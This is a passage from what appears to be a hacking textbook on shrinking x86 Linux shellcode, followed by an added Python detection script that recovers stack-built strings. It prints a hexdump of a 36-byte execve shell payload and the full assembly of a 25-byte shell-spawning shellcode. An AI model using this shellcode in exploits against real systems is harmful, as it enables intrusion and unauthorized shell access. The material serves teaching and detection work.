sh-3.2# whoami
root
sh-3.2#
This shellcode, however, can be shortened to less than the current
45 bytes. Since shellcode needs to be injected into program memory some-
where, smaller shellcode can be used in tighter exploit situations with smaller
usable buffers. The smaller the shellcode, the more situations it can be used
in. Obviously, the XAAAABBBB visual aid can be trimmed from the end of the
string, which brings the shellcode down to 36 bytes.
reader@hacking:~/booksrc/shellcodes $ hexdump -C exec_shell
00000000 eb 16 5b 31 c0 88 43 07 89 5b 08 89 43 0c 8d 4b |..[1..C..[..C..K|
00000010 08 8d 53 0c b0 0b cd 80 e8 e5 ff ff ff 2f 62 69 |..S........../bi|
00000020 6e 2f 73 68 |n/sh|
00000024
reader@hacking:~/booksrc/shellcodes $ wc -c exec_shell
36 exec_shell
reader@hacking:~/booksrc/shellcodes $
This shellcode can be shrunk down further by redesigning it and using
registers more efficiently. The ESP register is the stack pointer, pointing to
the top of the stack. When a value is pushed to the stack, ESP is moved up the
stack, toward lower addresses (by subtracting 4), and the value is placed at
the new top of the stack. When a value is popped from the stack, ESP is moved
back down, toward higher addresses (by adding 4).
The following shellcode uses push instructions to build the necessary
structures in memory for the execve() system call.
tiny_shell.s
BITS 32
; execve(const char *filename, char *const argv [], char *const envp[])
xor eax, eax ; Zero out eax.
push eax ; Push some nulls for string termination.
push 0x68732f2f ; Push "//sh" to the stack.
push 0x6e69622f ; Push "/bin" to the stack.
mov ebx, esp ; Put the address of "/bin//sh" into ebx, via esp.
push eax ; Push 32-bit null terminator to stack.
mov edx, esp ; This is an empty array for envp.
push ebx ; Push string addr to stack above null terminator.
mov ecx, esp ; This is the argv array with string ptr.
mov al, 11 ; Syscall #11.
int 0x80 ; Do it.
This shellcode builds the null-terminated string "/bin//sh" on the stack,
and then copies ESP for the pointer. The extra slash doesn't matter and
is effectively ignored. The same method is used to build the arrays for the
remaining arguments. The resulting shellcode still spawns a shell but is only
25 bytes, compared to 36 bytes using the jmp call method.
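The push-built string technique above is also what a triage or detection script looks for. The following Python is an added example, not code from the book: it derives the push immediates for "/bin//sh" the way the listing does, and scans a byte blob for runs of back-to-back push imm32 instructions to recover the string they build. The sample bytes are constructed here from the listing's two push instructions (hand-encoded as 68 followed by the little-endian immediate) surrounded by filler; they are not the full shellcode.

```python
import struct

PUSH_IMM32 = 0x68  # opcode of "push imm32" on 32-bit x86: 68 <4-byte imm>

# Constructed sample (not the full shellcode): the two push imm32 instructions
# from tiny_shell.s, hand-encoded as 68 <imm32 little-endian>, wrapped in
# filler NOPs so the scanner has to locate them.
SAMPLE = bytes.fromhex("90 90 31 c0 50 68 2f 2f 73 68 68 2f 62 69 6e 89 e3 90 90")

def immediates_for(s: str) -> list:
    """Dwords to push, in push order, so that s ends up on the stack: the
    last 4-byte chunk is pushed first and each chunk is read little-endian,
    so "//sh" -> 0x68732f2f. The length must already be a multiple of 4."""
    data = s.encode()
    if len(data) % 4:
        raise ValueError("string length must be a multiple of 4")
    chunks = [data[i:i + 4] for i in range(0, len(data), 4)]
    return [struct.unpack("<I", c)[0] for c in reversed(chunks)]

def push_immediates(code: bytes):
    """Linear sweep yielding (offset, imm32) for each push imm32 found. A
    sweep can mis-sync on a 0x68 inside another operand, so treat hits as
    triage leads rather than proof."""
    i = 0
    while i + 5 <= len(code):
        if code[i] == PUSH_IMM32:
            yield i, struct.unpack_from("<I", code, i + 1)[0]
            i += 5
        else:
            i += 1

def stack_strings(code: bytes, min_run: int = 2) -> list:
    """Recover strings built by runs of back-to-back push imm32. The last
    push of a run holds the first four bytes (the stack grows toward lower
    addresses) and each dword is repacked little-endian."""
    runs, current = [], []
    for off, imm in push_immediates(code):
        if current and off != current[-1][0] + 5:  # gap: start a new run
            runs.append(current)
            current = []
        current.append((off, imm))
    if current:
        runs.append(current)
    found = []
    for run in runs:
        if len(run) >= min_run:
            raw = b"".join(struct.pack("<I", imm) for _, imm in reversed(run))
            found.append((run[0][0], raw.rstrip(b"\x00")))
    return found
```

On the sample, `stack_strings` returns the string "/bin//sh" at offset 5; the doubled slash survives the decode, so any matching against "/bin/sh" should collapse repeated slashes first.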